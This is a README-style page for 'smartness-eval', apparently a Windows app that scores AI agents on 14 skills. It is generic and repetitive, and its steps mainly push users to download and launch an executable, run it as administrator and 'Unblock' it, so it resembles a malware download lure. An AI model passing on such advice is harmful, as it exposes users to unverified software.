smartness-eval is a Windows-ready tool for checking how well an AI agent performs across 14 skill areas. It helps you run a guided assessment, review the results, and compare agents with the same set of tasks.
This project is built for end users who want a direct way to test agent quality without setting up a complex lab. It follows ideas from CLEAR, T-Eval, and Anthropic-style evaluation, while keeping the process simple.
- A Windows PC
- At least 4 GB of RAM
- 500 MB of free disk space
- A stable internet connection for the first setup
- Permission to run downloaded apps on your device
For the best results, use Windows 10 or Windows 11.
- Open this page: https://github.com/Compound-epigraphy786/smartness-eval
- Find the download area on the repository page
- Download the package for Windows
- If the file is zipped, right-click it and choose Extract All
- Open the extracted folder
- Double-click the app or launcher file to start the tool
If Windows asks for approval, choose Run or Yes.
When you open the app for the first time, it will load the assessment workspace and prepare the default test set.
Follow these steps:
- Start the app
- Wait for the main screen to load
- Choose the AI agent you want to assess
- Pick a test profile or use the default one
- Begin the evaluation run
The app may take a short time to set up the first time you use it.
smartness-eval reviews an AI agent across 14 core areas, including:
- Task focus
- Instruction following
- Reasoning
- Tool use
- Memory use
- Self-checking
- Error handling
- Consistency
- Planning
- Response clarity
- Context handling
- Adaptation
- Safety sense
- Overall reliability
These areas help you see where an agent does well and where it needs work.
After each run, the tool gives you a score view for each dimension. You can use the results to:
- Compare agents side by side
- Check one agent over time
- Spot weak areas fast
- Review results with a simple score summary
- Save a record of each assessment
The report is meant to be easy to read, even if you do not work with AI tools every day.
Use smartness-eval like this:
- Open the app
- Load the agent you want to test
- Select the evaluation set
- Run the assessment
- Read the score panel
- Export or save the report if you need it later
If you are checking more than one agent, use the same test set for each run so the results stay fair.
- Make sure the download finished
- Check that you extracted the files if they came in a ZIP folder
- Right-click the app and choose Run as administrator
- Restart your PC and try again
- Open the file properties
- Look for an Unblock option
- Apply the change and reopen the app
- Wait a few moments
- Close the app and open it again
- Make sure your internet connection is active if the app needs to fetch data
- 14-dimension AI agent scoring
- Simple Windows setup
- Clear result view
- Side-by-side comparison support
- Repeatable test runs
- Clean review of strengths and gaps
- Built around common evaluation standards
After setup, you may see files like these:
- App launcher
- Config files
- Test sets
- Result output
- Logs
Leave the folder structure as it is unless the app asks you to change something.
smartness-eval is a good fit for:
- People who want to test an AI agent on Windows
- Teams that need a simple evaluation flow
- Users who want a score-based review of agent behavior
- Anyone comparing AI agent quality across the same tasks
Visit this page to download and run the app on Windows:
https://github.com/Compound-epigraphy786/smartness-eval
- Open the download page
- Download the Windows file
- Extract it if needed
- Open the app
- Run your first assessment
The app may show:
- A start screen
- Agent selection
- Test set choice
- Progress status
- Score results
- Export options
Each part is made to keep the process simple and easy to follow
AI agents can sound strong and still miss key tasks. A fixed assessment makes it easier to see real performance. smartness-eval gives you a direct way to check that performance with the same rules each time
- Keep the app in a folder you can find again
- Do not move files while the app is open
- Use the same Windows account each time if you want steady results
- Keep your system updated for smoother app behavior